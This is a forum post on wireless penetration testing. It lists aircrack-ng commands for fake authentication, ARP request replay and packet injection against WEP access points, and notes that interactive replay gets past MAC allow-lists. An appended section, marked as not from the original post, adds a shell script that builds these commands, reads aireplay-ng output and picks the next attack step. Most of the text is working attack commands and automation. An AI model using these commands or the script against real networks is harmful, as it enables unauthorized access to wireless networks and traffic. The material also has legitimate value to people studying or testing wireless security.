InfoSec Forums: Wireless Penetration Testing: All about Wireless Attacks Part I

This topic contains 0 replies, has 1 voice, and was last updated by  ddos-admin 3 months ago.

    ddos-admin (Keymaster), post #2964
    Common Commands Used in Aircrack-ng

    Injection Command

    aireplay-ng -3 -b <bssid MAC address> -h <source MAC address> ath0
    aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:46:11:19 ath0
    Fake Authentication Commands

    aireplay-ng -1 0 -e <SSID> -a <bssid MAC address> -h <source MAC address> ath0
    aireplay-ng -1 0 -e linksys -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0
    Or another variation for picky access points

    aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0


    Arp Replay Attack

    aireplay-ng -3 -b 00:13:10:30:24:9C mon0

    Basic usage:

    aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
    Where:

    -3 means standard arp request replay
    -b 00:13:10:30:24:9C is the access point MAC address
    -h 00:11:22:33:44:55 is the source MAC address (either an associated client or from fake authentication)
    ath0 is the wireless interface name
    There are two methods of replaying an ARP which was previously injected. The first and simplest method is to use the same command plus the "-r" to read the output file from your last successful ARP replay.

    aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 -r replay_arp-0219-115508.cap ath0
    Where:

    -3 means standard arp request replay
    -b 00:13:10:30:24:9C is the access point MAC address
    -h 00:11:22:33:44:55 is the source MAC address (either an associated client or from fake authentication)
    -r replay_arp-0219-115508.cap is the name of the file from your last successful ARP replay
    ath0 is the wireless interface name
    The second method is a special case of the interactive packet replay attack. It is presented here since it is complementary to the ARP request replay attack.

    aireplay-ng -2 -r replay_arp-0219-115508.cap ath0
    Where:

    -2 means interactive frame selection
    -r replay_arp-0219-115508.cap is the name of the file from your last successful ARP replay
    ath0 is the wireless card interface name
    NOTE: Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know
    one of the MAC addresses on the allowed list. Thus, the advantage of the next technique (interactive replay) is that it gets around this control.
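The post lists the fake authentication, ARP replay and replay-from-file commands as separate one-liners. The script below is an added example, not part of the original post or of the aircrack-ng project: it assembles those same commands from the post's own example values (SSID teddy, BSSID 00:14:6C:7E:40:80, source MAC 00:09:5B:EC:EE:F2, interface ath0), validates the MAC addresses first, and classifies the output of an aireplay-ng -1 run so a wrapper can decide whether to move on to ARP replay, retry with the "picky access point" variant, or fix the card MAC. The function names are invented for this example, the aireplay-ng message strings it matches are assumed from what that tool prints, and the sample outputs at the bottom are constructed rather than captured; nothing here invokes aireplay-ng itself.

```shell
#!/bin/sh
# Added example (not from the original post): builds the aireplay-ng commands
# shown above, checks inputs, and classifies fake-authentication output.
# Dry-run only: commands are printed, never executed.

# The post's own example values.
AP_MAC="00:14:6C:7E:40:80"
SSID="teddy"
SRC_MAC="00:09:5B:EC:EE:F2"
IFACE="ath0"

# A MAC must be six colon-separated hex octets; aireplay-ng rejects anything else.
is_mac() {
    printf '%s' "$1" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
}

# Fake authentication (aireplay-ng -1), the two variants given in the post:
#   normal: -1 0                 (associate once, no keep-alives)
#   picky:  -1 6000 -o 1 -q 10   (re-authenticate every 6000 s, one packet per
#           burst, keep-alive every 10 s) for APs that drop the simple form.
fakeauth_cmd() {  # $1 = normal | picky
    is_mac "$AP_MAC" && is_mac "$SRC_MAC" || { echo "bad MAC address" >&2; return 1; }
    case "$1" in
        normal) printf 'aireplay-ng -1 0 -e %s -a %s -h %s %s\n' "$SSID" "$AP_MAC" "$SRC_MAC" "$IFACE" ;;
        picky)  printf 'aireplay-ng -1 6000 -o 1 -q 10 -e %s -a %s -h %s %s\n' "$SSID" "$AP_MAC" "$SRC_MAC" "$IFACE" ;;
        *)      echo "unknown variant: $1" >&2; return 1 ;;
    esac
}

# ARP request replay (aireplay-ng -3). With a replay_arp-*.cap argument the ARP
# frames from an earlier run are replayed with -r instead of waiting for a new one.
arpreplay_cmd() {  # $1 = optional capture file from a previous successful replay
    is_mac "$AP_MAC" && is_mac "$SRC_MAC" || { echo "bad MAC address" >&2; return 1; }
    if [ -n "$1" ]; then
        printf 'aireplay-ng -3 -b %s -h %s -r %s %s\n' "$AP_MAC" "$SRC_MAC" "$1" "$IFACE"
    else
        printf 'aireplay-ng -3 -b %s -h %s %s\n' "$AP_MAC" "$SRC_MAC" "$IFACE"
    fi
}

# Classify aireplay-ng -1 output read from stdin. The substrings are assumed
# from aireplay-ng's own messages. A deauthentication after a successful
# association is checked first: the AP accepted and then dropped us, which is
# the symptom to expect from the MAC allow-list described in the note above.
# "mismatch" means -h differs from the card's MAC, so the AP's replies are never
# ACKed and the attack will not work until the two agree.
fakeauth_status() {
    out=$(cat)
    if printf '%s\n' "$out" | grep -q "doesn't match the specified MAC"; then
        echo mismatch
    elif printf '%s\n' "$out" | grep -q 'Got a deauthentication packet'; then
        echo deauth
    elif printf '%s\n' "$out" | grep -q 'AP rejects'; then
        echo rejected
    elif printf '%s\n' "$out" | grep -q 'Association successful'; then
        echo ok
    else
        echo unknown
    fi
}

# What to run next for a given status.
next_step() {  # $1 = status from fakeauth_status
    case "$1" in
        ok)              arpreplay_cmd ;;
        deauth|rejected) fakeauth_cmd picky ;;
        mismatch)        echo "set the card MAC of $IFACE to $SRC_MAC (or pass the card's real MAC with -h) and retry" ;;
        *)               echo "inspect the aireplay-ng output manually" ;;
    esac
}

# Constructed sample outputs (not captured from a real run).
SAMPLE_OK='18:22:32  Sending Authentication Request (Open System) [ACK]
18:22:32  Authentication successful
18:22:32  Sending Association Request [ACK]
18:22:32  Association successful :-) (AID: 1)'
SAMPLE_DEAUTH="$SAMPLE_OK
18:22:35  Got a deauthentication packet! (Waiting 3 seconds)"

fakeauth_cmd normal
st=$(printf '%s\n' "$SAMPLE_OK" | fakeauth_status);     echo "status: $st"; next_step "$st"
st=$(printf '%s\n' "$SAMPLE_DEAUTH" | fakeauth_status); echo "status: $st"; next_step "$st"
```

Run it as-is to see the three command lines it would issue; to use it for real, pipe the output of the printed fake authentication command into fakeauth_status and act on next_step. The MAC check and the mismatch branch exist because the most common reason the replay "sends packets but gets no ACKs" is a -h value that does not match the card's actual MAC, which is worth catching before any frames go on the air.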

